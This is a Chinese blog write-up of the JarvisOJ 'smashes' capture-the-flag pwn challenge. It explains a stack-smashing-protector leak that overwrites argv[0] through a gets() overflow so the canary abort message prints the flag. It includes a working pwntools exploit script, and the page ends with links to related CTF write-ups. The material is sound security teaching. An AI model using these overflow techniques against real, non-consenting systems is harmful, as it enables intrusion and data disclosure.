JarvisOJ smashes

最新推荐文章于 2021-02-16 17:19:39 发布
最新推荐文章于 2021-02-16 17:19:39 发布
阅读量324 收藏 1
点赞数
文章标签: pwn 栈溢出 canary保护
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/95335332
版权

这题仍然是栈溢出题,只不过加入了栈保护CANARY,要做这题,CANARY的作用以及他对栈的影响一定要有所了解,不然将无从下手。

拿到程序,首先查看一下保护:
在这里插入图片描述
程序开了CANARY保护,有点麻烦。
对于canary,就是在栈底前面一点点(不一定贴近)加入一串字符,如果你暴力进行栈溢出,你就会覆盖canary,导致程序报错,只是栈的一种保护机制。
我们先进入IDA查看程序逻辑:
在这里插入图片描述
我们可以看到在函数sub_4007e0()处存在明显的get函数产生的栈溢出漏洞,但是因为程序的各种保护,我们并不能暴力破栈,只能看看有什么其他的方法。
在这里插入图片描述
双击进入600d20,我们发现一个类似flag的字符串:
在这里插入图片描述
但是这肯定不是真正的flag,从其中的英文来看,在远程服务器中,这就是flag的地址。
我们前面说到,对于canary的的报错我们有了一定了解:当程序输入覆盖canary的时候,canary会打印main函数
的argv(0)到输出流中,这里,我们只需要把argv(0)覆盖成这个flag,我们就能获得真正的flag了。
但是我们发现函数却修改了在0x600d20处的flag:
在这里插入图片描述
这该怎么办呢?
其实在一些小程序中,对于这些小文本会有备份,我们通过gdb查找就行了:
在这里插入图片描述
我们发现在0x400d21处也有一个一样的东西(在find CTF这条语句时,一定要保证程序在运行状态,可以下断点或者强行溢出)
找到了flag,我们就要知道argv(0)的地址了,在程序运行时,argv(0)保存的是程序的绝对地址,故我们可以在程序运行时find程序的绝对地址:
在这里插入图片描述
0x7fffffffe224就是了,接下来我们就要寻找我们输入是从哪个地址开始的了:
我们在call IO_gets后面下一个断点,寻找我们输入时的地址
在这里插入图片描述
我们找到地址是0x7fffffffdc50,我们算得相对偏移为(0x7fffffffe224-0x7fffffffdc50)/8=177
所以我们就能构造payload的了,完整exp如下:

#!/usr/bin/env python
from pwn import *
p=remote('pwn.jarvisoj.com',9877)
p.recvuntil('name?')
p.sendline(p64(0x0400d21)*177)
p.recvuntil('flag:')
p.sendline('1')
print p.recv()
p.interactive()

运行结果如下:
在这里插入图片描述

PLpa、
关注
Jarvis OJ --Smashes (SSP leak攻击)
Kni9hT's Blog
11-03 776
1
18.9.19 Jarvis OJ PWN----Smashes
qq_42192672的博客
09-19 548
先checksec一下 我的天,有栈保护,nx,咋办…… IDA进去,我们可以看见有个函数挺关键的,如下 我们可以看到stdin是可以无限输入的,但是只有接收输入时接收到'\n',才会继续执行(跳出while循环),找不出栈溢出的办法 然后看了大佬的操作之后发现:可以故意触发canary来攻击(SSP(Stack Smashing Protector ) leak) 先介绍一下好...
jarvis oj smashes
发蝴蝶和大脑斧的博客
02-23 438
checksec发现开启了nx和canary。ida打开发现输入name时存在栈溢出,缓冲区大小0x108,同时发现存在"PCTF{Here’s the flag on server}"字符串,不过第二次输入的时候会覆盖。当检测到修改了canary时会返回'*** stack smashing detected ***: /home/ctf/smashes terminated\n'。 此处“/h...
Smashes Jarvis OJ
九层台
04-06 642
nc pwn.jarvisoj.com 9877 检查开启的保护 liu@ubuntu:~/Desktop$ checksec 2 [*] '/home/liu/Desktop/2' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found #栈保护 NX: NX en...
(Jarvis Oj)(Pwn) Smashes
Nothing
06-14 2430
(Jarvis Oj)(Pwn) Smashes 查看保护。打开了栈保护。看上去有点麻烦。 再来分析下程序代码。如下是主要的函数体部分。 这个函数首先让我们输入name字符串,通过gets()函数,是有溢出的,但是在输入过长的字符串时程序会abort。 并且提示 ./smashes terminated 这里其实是ssp(Stack Smashing Protector)的提示...
canary入门小总结(遇到的新题型:jarvis oj pwn smashes解题以及一些基础了解)
ins_Digger的博客
11-01 897
今天的我还是在做pwn题,没怎么看书。本来今天打算做picoCTF的pwn题的,无奈怎么也连不上它的shell。(难受)然后去Jarvis OJpwn题去了。 题目挑着做,总共只做了两题。第一题是简单的栈溢出。第二题就很有趣了,是我没遇过的题 看网上大神们写的writeup叫做canary。 做完题目后稍微去搜索了一下关于这种题目的资料。(这里吐槽一下有些写writeup的博主,本来就是新手题...
Jarvis OJ-PWN
weixin_45461609的博客
08-08 260
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一点关系也没有。 提供了system()函数 并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
Jarvis Oj smashes 经验总结
qq_43189757的博客
07-18 204
解题思路: 本题除了PIE 和 RELRO 其他保护都开了 而ELF文件中告诉了你flag的位置,所以要通过某个漏洞去读取这个地址上的flag,在触发 CANARY 这个保护时, 程序会终止并且输出argv[0] 的内容,利用这点加上gets函数的无限读取可以覆盖argv[0] 处的内容,从而输出我们想输出的内容 (本来在pwnable.kr 上做过类似的题目,但是过了太久忘光了,全程在想有没有其...
[Jarvis OJ - PWN]——Smashes
Y_peak的博客
02-16 237
[Jarvis OJ - PWN]——Smashes 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先checksec一下看看。64位,并且除了PIE,其他保护基本都开启了。 在IDA中看看 发现有可以利用的栈溢出, 我原本的想法是将canary给泄露出来。但是看到触发了canary保护后的结果, 有点不对劲。 修改了文件名后,我确定了, 泄露的就是argv[0]。我们可以通过将其覆盖, 主动触发canary保护, 将flag拿到手。 我们
(Jarvis Oj)(Re)Smali
Nothing
03-30 581
(Jarvis Oj)(Re)Smali 安卓的smali文件,有自己的语法,熟悉这个语法可以直接还原成源文件。然而我并看不懂。应为程序比较简单所以靠猜也是可以知道大概意思的。 .class public Lnet/bluelotus/tomorrow/easyandroid/Crackme; .super Ljava/lang/Object; .source "Crackme.java"...
pwn学习-jarvisoj-smashes-利用canary打印信息
qq_45653588的博客
12-22 308
下载文件,先检查一下保护机制,开得还挺多的。 反编译一下查看伪代码。 unsigned __int64 sub_4007E0() { __int64 v0; // rbx int v1; // eax __int64 v3; // [rsp+0h] [rbp-128h] unsigned __int64 v4; // [rsp+108h] [rbp-20h] v4 = __readfsqword(0x28u); __printf_chk(1LL, "Hello!\nWhat's
JarvisOJ Web&Reverse&Pwn
热门推荐
4ct10n
11-16 5万+
Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK
第12周OJ实践 爬楼梯
越努力,越幸运!!!
11-22 1401
问题及代码: /*烟台大学计算机学院 题目描述:爬楼梯 作者:景怡乐 完成时间:2016年11月22日 */ #include #include unsigned long count (int n); int main() { int n; unsigned long m; printf("请输入楼梯的台阶数;"); scanf("%d",&n);
171119 Pwn-StackSmash
whklhhhh的博客
11-24 983
1625-5 王子昂 总结《2017年11月19日》 【连续第415天总结】 A. pwn-StackSmash B.原理当程序加了Cannary保护时,栈溢出会使得程序异常终止并输出错误信息 StackSmash就是利用这个错误信息进行任意地址读取的 报错函数为__stack_chk_fail,代码如下:void __attribute__ ((noreturn)) __stack_c
jarvis oj(web wp)
Xi4or0uji
08-19 6931
api调用 这题是slim架构的xxe漏洞,看博客做题2333 https://www.leavesongs.com/PENETRATION/slim3-xxe.html simple injection username和password是注入点,然后就是确认怎么注入了 题目是过滤了空格的,但是可以用/**/绕过 确认存在admin表 username=admin'/**/...
Jarvis easycrackme
Bill
11-19 993
记一次糟心的经历, printf((unsigned __int64)"Input your password:"); scanf((unsigned __int64)&unk_4A572B); if ( strlen((const char *)&v11) == 26 ) //flag长度是26 { v3 = 0LL; if ( (v11 ^ 0xAB) == list
jarvisOJ)(pwn)level6_x86
PLpa的博客
08-05 452
Unlink!Unlink!Unlink! level6_x86作为一道堆溢出入门题,还是值得用来练练手,学习一下堆的基础的知识的。 参考文献: ctf-wiki:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/unlink-zh/ 大佬博客:https://blog.csdn.net/weixin_41617275/article...
jarvisoj pwn smashes (2015 32c3-ctf hackme) [Stack Smash]
ACdream
02-07 558
题目链接: https://www.jarvisoj.com/challenges 题目bin文件来源: github - ctfswriteup - 2015 - 32c3ctf - pwn - hackme   分析过程: 开启了NX与Canary 程序流程: 输入名字之后,即可输入一个地址去覆盖flag~这里涉及的知识点是:Stack Smash 当程序开启了Can...
手工标注的包含两层类别结构的网页分类数据集_Hierarchical-WebSite-Theme-DataSet_SCU.zip
最新发布
10-01
手工标注的包含两层类别结构的网页分类数据集_Hierarchical-WebSite-Theme-DataSet_SCU
编写代码实现剪刀、石头、布的猜拳游戏:玩家输入1、2、3表示剪刀、石头、布
06-12
Rock smashes Scissors.") elif player_choice == 3 and computer_choice == 2: print("You win! Paper covers Rock.") else: print("You lose! Better luck next time.") play_game() ``` 使用random库生成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值